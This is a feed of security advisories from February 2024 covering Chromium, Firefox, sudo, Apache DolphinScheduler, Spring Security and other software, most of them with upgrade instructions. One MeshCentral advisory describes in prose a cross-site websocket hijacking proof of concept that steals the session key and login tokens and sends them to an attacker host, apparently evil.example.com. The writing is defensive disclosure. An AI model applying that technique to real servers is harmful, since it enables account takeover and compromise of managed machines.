Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-23

19.02.2024 02:00:00 | gentoo | [GLSA-202402-24] Seamonkey: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in Seamonkey, the worst of which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-24

19.02.2024 02:00:00 | gentoo | [GLSA-202402-25] Mozilla Thunderbird: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-25

19.02.2024 02:00:00 | gentoo | [GLSA-202402-26] Mozilla Firefox: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-26

19.02.2024 02:00:00 | gentoo | [GLSA-202402-27] Glade: Denial of Service (normal)
A vulnerability has been discovered in Glade which can lead to a denial of service.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-27
19.02.2024 02:00:00 | redhat | [RHSA-2024:0811] sudo security update (moderate)

The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Bug Fix(es) and Enhancement(s):

* CVE-2023-28487 sudo: Sudo does not escape control characters in sudoreplay output
* CVE-2023-28486 sudo: Sudo does not escape control characters in log messages
* CVE-2023-42465 sudo: Targeted Corruption of Register and Stack Variables

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0811
21.02.2024 04:54:57 | npm | [NPM:GHSA-C9VV-FHGV-CJC3] agent-js: Insecure Key Generation in `Ed25519KeyIdentity.generate` (critical)

## Impact

The library offers a function to generate an ed25519 key pair via `Ed25519KeyIdentity.generate` with an optional param to provide a 32 byte seed value, which will then be used as the secret key. **When no seed value is provided, it is expected that the library generates the secret key using secure randomness**. However, a recent change **broke this guarantee** and **uses an insecure seed for key pair generation**.

Since the private key of this identity (`535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe`) is compromised, one could lose funds associated with the principal on ledgers or lose access to a canister where this principal is the controller. Users are asked to take the proactive measures mentioned below under "Workarounds: Users" to protect their assets.

## Patches

A patch for the vulnerability is **available in v1.0.1** for all the packages listed in the advisory. Please upgrade and deploy your canisters immediately.

## Workarounds

### Developers

The recommended fix is to upgrade the package to the patched version. If that is not possible, there are a couple of workarounds to handle the insecure key generation.

1. Invoking the function as `Ed25519KeyIdentity.generate(null)` would fix the broken conditional evaluation and force the function to generate a securely random seed. However, this is not guaranteed to work for future upgrades.
2. Passing securely generated randomness as a seed to `Ed25519KeyIdentity.generate` would force the library to use it as the seed to generate the key pair.

### Users

#### Removing a controller of a canister if it's the affected principal

For all canisters you control, fetch the controllers of the canisters using

```sh
dfx canister info --ic <CANISTER>
```

If you see the principal `535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe` as one of the controllers, follow the steps below

```sh
dfx identity whoami # record CURRENT_IDENTITY
dfx identity new <NEW_IDENTITY_NAME>
dfx identity use <NEW_IDENTITY_NAME>
dfx identity get-principal <NEW_IDENTITY_NAME> # record NEW_IDENTITY_PRINCIPAL
dfx identity use <CURRENT_IDENTITY>
dfx canister update-settings --ic <CANISTER> --add-controller <NEW_IDENTITY_PRINCIPAL>
dfx canister update-settings --ic <CANISTER> --remove-controller 535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe
```

For more details on canister management, please visit [here](https://internetcomputer.org/docs/current/tutorials/developer-journey/level-1/1.6-managing-canisters).

#### Checking funds on wallets / ledgers

If you have funds on ledgers using a browser wallet, please check if the account principal matches `535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe`. If it does, please create a new account and transfer the funds to the new account immediately.

## References

1. [fix PR link](https://github.com/dfinity/agent-js/pull/851)
2. [NPM patched version](https://www.npmjs.com/package/@dfinity/identity/v/1.0.1)
3. [agent-js Github repo](https://github.com/dfinity/agent-js)
4. [agent-js docs](https://agent-js.icp.xyz/identity/index.html)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C9VV-FHGV-CJC3
21.02.2024 02:34:15 | maven | [MAVEN:GHSA-7RW2-3HHP-RC46] Cross-site Scripting Vulnerability in Statement Browser (moderate)

### Impact

A maliciously crafted xAPI statement could be used to perform script or other tag injection in the LRS Statement Browser.

### Patches

The problem is patched in version 1.2.17 of the LRS library and [version 0.7.5 of SQL LRS](https://github.com/yetanalytics/lrsql/releases/tag/v0.7.5).

### Workarounds

No workarounds exist; we recommend upgrading to version 1.2.17 of the library or version 0.7.5 of SQL LRS immediately.

### References

* [LRS Tag](https://github.com/yetanalytics/lrs/releases/tag/v1.2.17)
* [LRS lib on Clojars](https://clojars.org/com.yetanalytics/lrs/versions/1.2.17)
* [SQL LRS 0.7.5 Release](https://github.com/yetanalytics/lrsql/releases/tag/v0.7.5)

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7RW2-3HHP-RC46
21.02.2024 02:10:39 | npm | [NPM:GHSA-CP68-QRHR-G9H8] MeshCentral cross-site websocket hijacking (CSWSH) vulnerability (high)

We have identified a cross-site websocket hijacking (CSWSH) vulnerability within the control.ashx endpoint of MeshCentral. This component is the primary mechanism used within MeshCentral to perform administrative actions on the server. To demonstrate the impact of the vulnerability we developed a proof-of-concept which leveraged the cross-site websocket hijacking vulnerability to read the server configuration file to leak the sessionKey variable, generate login tokens, and generate an authentication cookie.

The vulnerability is exploitable when an attacker is able to convince a victim end-user to click on a malicious link to a page hosting an attacker-controlled site. The attacker can then originate a cross-site websocket connection using client-side JavaScript code to connect to "control.ashx" as the victim user within MeshCentral. There are some caveats to exploiting this issue, however, as MeshCentral configures the `SameSite=Lax` security setting on cookies, which introduces some additional preconditions for exploitation which we cover in a subsequent section.

### MeshCentral Version Tested

We performed testing against MeshCentral version 1.1.20, which appears to be the latest supported version of the application. This appears to have been the latest version of MeshCentral available at the time we performed testing of the application in January and February 2024 (see Figure 1 and Figure 2).

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/4a24fce2-5047-47a1-ac91-ae84c44ef3f1)

Figure 1: We determined that MeshCentral version 1.1.20 was the latest version available at the time we performed testing of the application.

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/4e347e91-6296-4b1a-a1d0-bb3587a82ea3)

Figure 2: We configured our test environment on an Ubuntu server running version 1.1.20 of the MeshCentral application server.

### What about SameSite=Lax Cookie Settings?

One may make the counterpoint that the `SameSite=Lax` security setting (see Figure 4) effectively prevents cross-site websocket hijacking (CSWSH) issues, as an attacker origin of attacker.com would not be within the same site as the victim MeshCentral server at, say, meshcentral.example.com. This means an attacker who is able to convince a user to click on a malicious link wouldn't be able to successfully perform this attack, due to the Lax setting with differing origins.

Unfortunately, this isn't entirely correct, as there is a core difference between same-site and same-origin policies within all modern browsers. In this case, while it's valid to say that the attack wouldn't work in the case of attacker.com targeting meshcentral.example.com when the SameSite setting is configured to Lax for session cookies, there are several other scenarios where an attacker could perform the attack successfully (see Figure 3).

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/b108232d-7f85-4815-9439-431db0eeed85)

Figure 3: A table from PortSwigger's article on Bypassing SameSite Cookie Restrictions (source).

From our perspective, the most relevant scenario is when an attacker is able to compromise an adjacent subdomain, either through a vector such as a system compromise, exploiting a subdomain takeover vulnerability, or through exploitation of a cross-site scripting vulnerability within an adjacent application running under the same domain. For example, if an attacker found a cross-site scripting issue on example.com or vulnerable.example.com, they would then be able to leverage the cross-site scripting issues on those domains to target meshcentral.example.com. There are other factors which could also allow an attacker to bypass the SameSite=Lax setting to perform cross-site websocket hijacking. For a more comprehensive list please see Bypassing SameSite Cookie Restrictions from PortSwigger.

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/8310a307-273f-44e5-948a-f1a2b49cf960)

Figure 4: We observed that upon logging into MeshCentral the "xid" and "xid.sig" tokens were configured with the SameSite=Lax security settings.

### Developing an Initial Proof-of-Concept Exploit

At this point we had a testing deployment of MeshCentral configured at meshcentral.example.com and simulated an attacker-compromised adjacent subdomain at evil.example.com. In this scenario, we assume the attacker exploited a subdomain takeover vulnerability to host malicious content on evil.example.com. Next, we developed a simple proof-of-concept payload which originated a cross-site websocket connection from the evil.example.com origin to meshcentral.example.com (see Figure 5).

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/725820ef-5e93-48f5-aa47-9e21b299f255)

Figure 5: An initial proof-of-concept exploit we developed which simply sent a ping message over the websocket connection from evil.example.com targeting meshcentral.example.com.

We then triggered the exploit payload as a user that was logged into the MeshCentral application as an administrator by browsing to evil.example.com with a valid session on meshcentral.example.com. We observed a cross-site websocket connection to meshcentral.example.com with an origin header set to evil.example.com, as it originated from the attacker domain (see Figure 6). The response indicated the connection was successful and we received the expected pong response to our ping message sent to the server.

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/9bcec329-4206-4ce6-bbba-a02a47c306d8)

Figure 6: We observed that when originating a websocket connection across origins the origin header was sent by the browser to the MeshCentral server, indicating the origin which originated the cross-site websocket connection.

### Demonstrating Impact

After confirming the vulnerability we then developed a more comprehensive exploit payload to demonstrate the impact of the vulnerability (see Figure 7). Our new payload sent the serverconfig, authcookie, and createLoginToken actions to the administrative component. The ability to issue a new login token then provided us with persistent access to the user's account. The ability to read the serverconfig file allowed us to exfiltrate the session key used to sign sessions, allowing the attacker to forge valid session tokens as arbitrary users on the system. Our payload then read the response from the server and exfiltrated the sensitive data exported from the system to an attacker-controlled system for storage purposes (see Figure 8).

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/d42f8372-24c9-4786-bfaa-ed1f91915749)

Figure 7: A proof-of-concept exploit we developed for the cross-site websocket hijacking vulnerability, resulting in complete compromise of the user's account and persistent access to the MeshCentral application as the victim user.

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/3e3977e1-a8c8-4856-9d27-f0307855049c)

Figure 8: We performed the attack using the exploit code shown in Figure AA to invoke the authcookie, serverconfig, and createLoginToken endpoints on the victim MeshCentral system, leveraging the cross-site websocket hijacking vulnerability from evil.example.com.

After performing the attack successfully we used the issued login token to authenticate to MeshCentral and access the console as the NT AUTHORITY\SYSTEM user for a Windows agent which connected to the victim MeshCentral instance. This provided compromise of all the nodes within the impacted MeshCentral instance (see Figure 9 and Figure 10).

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/95405b59-8073-483e-9527-e1d03b546f5a)

Figure 9: An attacker could leverage the login token created by the attacker to authenticate to MeshCentral and then leverage this access to compromise nodes managed by the impacted MeshCentral instance.

![image](https://github.com/Ylianst/MeshCentral/assets/1319013/605b909e-54eb-4ad0-b397-84fa3fb9455d)

Figure 10: An attacker could leverage the cross-site websocket hijacking vulnerability to read the server configuration file of the MeshCentral system as an administrator to obtain the key used to encrypt sessions (sessionKey).

### Remediation

To remediate this vulnerability we recommend inspecting the origin header when websocket connections are established to control.ashx and other websocket endpoints. Verify that the origin header sent to the server matches an allowlisted origin. This would prevent an attacker from originating a cross-site websocket connection from an untrusted site.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CP68-QRHR-G9H8
20.02.2024 23:14:06 | slackware | [SSA:2024-051-02] libuv

New libuv packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/libuv-1.48.0-i586-1_slack15.0.txz: Upgraded.
  This update fixes a server-side request forgery (SSRF) flaw.
  Thanks to alex2grad for the heads-up.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-24806
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libuv-1.48.0-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libuv-1.48.0-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libuv-1.48.0-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libuv-1.48.0-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
168acaabcc67333e202fc3d9ac527d44 libuv-1.48.0-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
d6bf2ac93ed9649937755919a5233275 libuv-1.48.0-x86_64-1_slack15.0.txz

Slackware -current package:
fbcd398c4621d98839d041ec8632fc7f l/libuv-1.48.0-i586-1.txz

Slackware x86_64 -current package:
08108e6e433d2af7c84a39415fffd64a l/libuv-1.48.0-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg libuv-1.48.0-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-051-02
20.02.2024 20:47:43 | slackware | [SSA:2024-051-01] mozilla-firefox

New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-firefox-115.8.0esr-i686-1_slack15.0.txz: Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/firefox/115.8.0/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2024-06/
    https://www.cve.org/CVERecord?id=CVE-2024-1546
    https://www.cve.org/CVERecord?id=CVE-2024-1547
    https://www.cve.org/CVERecord?id=CVE-2024-1548
    https://www.cve.org/CVERecord?id=CVE-2024-1549
    https://www.cve.org/CVERecord?id=CVE-2024-1550
    https://www.cve.org/CVERecord?id=CVE-2024-1551
    https://www.cve.org/CVERecord?id=CVE-2024-1552
    https://www.cve.org/CVERecord?id=CVE-2024-1553
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.8.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.8.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.8.0esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.8.0esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
02f08793a474ae14ee79dfe55a46f978 mozilla-firefox-115.8.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
ab30a974f11126bde6c390a51e8506f8 mozilla-firefox-115.8.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
67d3f23b17823a87b6130a3bcb746631 xap/mozilla-firefox-115.8.0esr-i686-1.txz

Slackware x86_64 -current package:
98e662cff14e1b4885ebf83339c32f9f xap/mozilla-firefox-115.8.0esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:

`# upgradepkg mozilla-firefox-115.8.0esr-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-051-01
21.02.2024 02:22:50 | maven | [MAVEN:GHSA-36XR-4X2F-CFJ9] Deserialization of Untrusted Data in Apache Camel SQL (high)

Deserialization of Untrusted Data vulnerability in Apache Camel SQL Component. This issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.

Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-36XR-4X2F-CFJ9
21.02.2024 02:22:05 | maven | [MAVEN:GHSA-M43P-55RF-8C2J] Deserialization of Untrusted Data in Apache Camel CassandraQL (high)

Deserialization of Untrusted Data vulnerability in Apache Camel CassandraQL Component AggregationRepository which is vulnerable to unsafe deserialization. Under specific conditions it is possible to deserialize malicious payload.

This issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.

Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M43P-55RF-8C2J
21.02.2024 02:21:46 | maven | [MAVEN:GHSA-FF2W-WM48-JHQJ] Arbitrary File Read Vulnerability in Apache Dolphinscheduler (high)

Arbitrary File Read Vulnerability in Apache Dolphinscheduler. This issue affects Apache DolphinScheduler: before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FF2W-WM48-JHQJ
21.02.2024 02:21:29 | maven | [MAVEN:GHSA-VJQC-G788-F378] Session Fixation Apache DolphinScheduler (moderate)

Session fixation in Apache DolphinScheduler before version 3.2.1: a session remains valid after the password has been changed. Users are recommended to upgrade to version 3.2.1, which fixes this issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VJQC-G788-F378
21.02.2024 02:19:02 | maven | [MAVEN:GHSA-37GX-JQX9-FWMG] Improper Certificate Validation in Apache DolphinScheduler (high)

Because the HttpUtils class did not verify certificates, an attacker that could perform a Man-in-the-Middle (MITM) attack on outgoing https connections could impersonate the server.

This issue affects Apache DolphinScheduler: before 3.2.1. Users are recommended to upgrade to version 3.2.1, which fixes the issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-37GX-JQX9-FWMG
21.02.2024 02:18:00 | maven | [MAVEN:GHSA-QWXX-XWW6-8Q8M] Remote Code Execution in Apache Dolphinscheduler (high)

This issue affects Apache DolphinScheduler 3.0.0 before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QWXX-XWW6-8Q8M
21.02.2024 02:17:30 | maven | [MAVEN:GHSA-W3W6-26F2-P474] Broken Access Control in Spring Security With Direct Use of isFullyAuthenticated (high)

In Spring Security, versions 6.1.x prior to 6.1.7 and versions 6.2.x prior to 6.2.2, an application is vulnerable to broken access control when it directly uses the AuthenticationTrustResolver.isFullyAuthenticated(Authentication) method.

Specifically, an application is vulnerable if:

* The application uses AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly and a null authentication parameter is passed to it resulting in an erroneous true return value.

An application is not vulnerable if any of the following is true:

* The application does not use AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly.
* The application does not pass null to AuthenticationTrustResolver.isFullyAuthenticated
* The application only uses isFullyAuthenticated via Method Security https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html or HTTP Request Security https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W3W6-26F2-P474
20.02.2024 10:00:00 | msrc | [MS:CVE-2024-21315] Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability (important)

https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21315
21.02.2024 02:16:34 | npm | [NPM:GHSA-3JCV-5F9P-2F2P] Cross-site Scripting in electron-pdf (high)

electron-pdf version 20.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the HTML content entered by the user.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3JCV-5F9P-2F2P
20.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0150] .NET 8.0 security update (important)

[8.0.101-1.0.1]
- Add support for Oracle Linux
- Update to .NET SDK 8.0.101 and Runtime 8.0.1

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0150
20.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0888] edk2 security update (low)

[20220126gitbb1bba3d77-6.el8_9.3]
- edk2-Bumped-openssl-submodule-version-to-cf317b2bb227.patch [RHEL-7560]
- Resolves: RHEL-7560 (CVE-2023-3446 edk2: openssl: Excessive time spent checking DH keys and parameters [rhel-8])

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0888
20.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0889] oniguruma security update (moderate)

[6.8.2-2.1]
- Fix CVE-2019-13224 Resolves: RHEL-6970
- Fix CVE-2019-16163 Resolves: RHEL-9506
- Fix CVE-2019-19012 Resolves: RHEL-9511
- Fix CVE-2019-19203 Resolves: RHEL-9510
- Fix CVE-2019-19204 Resolves: RHEL-9509

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0889
20.02.2024 02:00:00 | oraclelinux | [ELSA-2024-0893] python-pillow security update (important)

[5.1.1-18.1]
- Security fix for CVE-2023-50447
  Resolves: RHEL-22240

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0893
20.02.2024 02:00:00 | redhat | [RHSA-2024:0879] java-1.8.0-ibm security update (moderate)

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR8-FP15.

Security Fix(es):

* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)
* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)
* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0879
20.02.2024 02:00:00 | redhat | [RHSA-2024:0887] go-toolset:rhel8 security update (moderate)

Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

Security Fix(es):

* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)
* golang: cmd/go: Protocol Fallback when fetching modules (CVE-2023-45285)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0887
20.02.2024 02:00:00 | redhat | [RHSA-2024:0888] edk2 security update (low)

EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.

Security Fix(es):

* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0888
20.02.2024 02:00:00 | redhat | [RHSA-2024:0893] python-pillow security update (important)

The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.

Security Fix(es):

* pillow: Arbitrary Code Execution via the environment parameter (CVE-2023-50447)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0893
20.02.2024 02:00:00 | mozilla | [MFSA-2024-06] Security Vulnerabilities fixed in Firefox ESR 115.8 (high)

- CVE-2024-1546: Out-of-bounds memory read in networking channels (high)
  When storing and re-accessing data on a networking channel, the length of buffers may have been confused, resulting in an out-of-bounds memory read.
- CVE-2024-1547: Alert dialog could have been spoofed on another site (high)
  Through a series of API calls and redirects, an attacker-controlled alert dialog could have been displayed on another website (with the victim website's URL shown).
- CVE-2024-1548: Fullscreen Notification could have been hidden by select element (moderate)
  A website could have obscured the fullscreen notification by using a dropdown select input element. This could have led to user confusion and possible spoofing attacks.
- CVE-2024-1549: Custom cursor could obscure the permission dialog (moderate)
  If a website set a large custom cursor, portions of the cursor could have overlapped with the permission dialog, potentially resulting in user confusion and unexpected granted permissions.
- CVE-2024-1550: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (moderate)
  A malicious website could have used a combination of exiting fullscreen mode and <code>requestPointerLock</code> to cause the user's mouse to be re-positioned unexpectedly, which could have led to user confusion and inadvertently granting permissions they did not intend to grant.
- CVE-2024-1551: Multipart HTTP Responses would accept the Set-Cookie header in response parts (moderate)
  Set-Cookie response headers were being incorrectly honored in multipart HTTP responses. If an attacker could control the Content-Type response header, as well as control part of the response body, they could inject Set-Cookie response headers that would have been honored by the browser.
- CVE-2024-1552: Incorrect code generation on 32-bit ARM devices (low)
  Incorrect code generation could have led to unexpected numeric conversions and potential undefined behavior. *Note:* This issue only affects 32-bit ARM devices.
- CVE-2024-1553: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (high)
  Memory safety bugs present in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-06
20.02.2024 02:00:00 | mozilla | [MFSA-2024-05] Security Vulnerabilities fixed in Firefox 123 (high)

- CVE-2024-1546: Out-of-bounds memory read in networking channels (high)
  When storing and re-accessing data on a networking channel, the length of buffers may have been confused, resulting in an out-of-bounds memory read.
- CVE-2024-1547: Alert dialog could have been spoofed on another site (high)
  Through a series of API calls and redirects, an attacker-controlled alert dialog could have been displayed on another website (with the victim website's URL shown).
- CVE-2024-1548: Fullscreen Notification could have been hidden by select element (moderate)
  A website could have obscured the fullscreen notification by using a dropdown select input element. This could have led to user confusion and possible spoofing attacks.
- CVE-2024-1549: Custom cursor could obscure the permission dialog (moderate)
  If a website set a large custom cursor, portions of the cursor could have overlapped with the permission dialog, potentially resulting in user confusion and unexpected granted permissions.
- CVE-2024-1550: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (moderate)
  A malicious website could have used a combination of exiting fullscreen mode and <code>requestPointerLock</code> to cause the user's mouse to be re-positioned unexpectedly, which could have led to user confusion and inadvertently granting permissions they did not intend to grant.
- CVE-2024-1551: Multipart HTTP Responses would accept the Set-Cookie header in response parts (moderate)
  Set-Cookie response headers were being incorrectly honored in multipart HTTP responses. If an attacker could control the Content-Type response header, as well as control part of the response body, they could inject Set-Cookie response headers that would have been honored by the browser.
- CVE-2024-1552: Incorrect code generation on 32-bit ARM devices (low)
  Incorrect code generation could have led to unexpected numeric conversions and potential undefined behavior. *Note:* This issue only affects 32-bit ARM devices.
- CVE-2024-1553: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (high)
  Memory safety bugs present in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2024-1554: fetch could be used to effect cache poisoning (moderate)
  The <code>fetch()</code> API and navigation incorrectly shared the same cache, as the cache key did not include the optional headers <code>fetch()</code> may contain. Under the correct circumstances, an attacker may have been able to poison the local browser cache by priming it with a <code>fetch()</code> response controlled by the additional headers. Upon navigation to the same URL, the user would see the cached response instead of the expected response.
- CVE-2024-1555: SameSite cookies were not properly respected when opening a website from an external browser (moderate)
  When opening a website using the <code>firefox://</code> protocol handler, SameSite cookies were not properly respected.
- CVE-2024-1556: Invalid memory access in the built-in profiler (low)
  The incorrect object was checked for NULL in the built-in profiler, potentially leading to invalid memory access and undefined behavior. *Note:* This issue only affects the application when the profiler is running.
- CVE-2024-1557: Memory safety bugs fixed in Firefox 123 (high)
  Memory safety bugs present in Firefox 122. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-05
20.02.2024 02:00:00 | mozilla | [MFSA-2024-07] Security Vulnerabilities fixed in Thunderbird 115.8 (high)

In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts.

https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-07
20.02.2024 02:00:00 | redhat | [RHSA-2024:0876] kpatch-patch security update (important)

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)
* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)
* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)
* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0876
20.02.2024 02:00:00 | redhat | [RHSA-2024:0881] kernel-rt security update (important)

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)
* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)
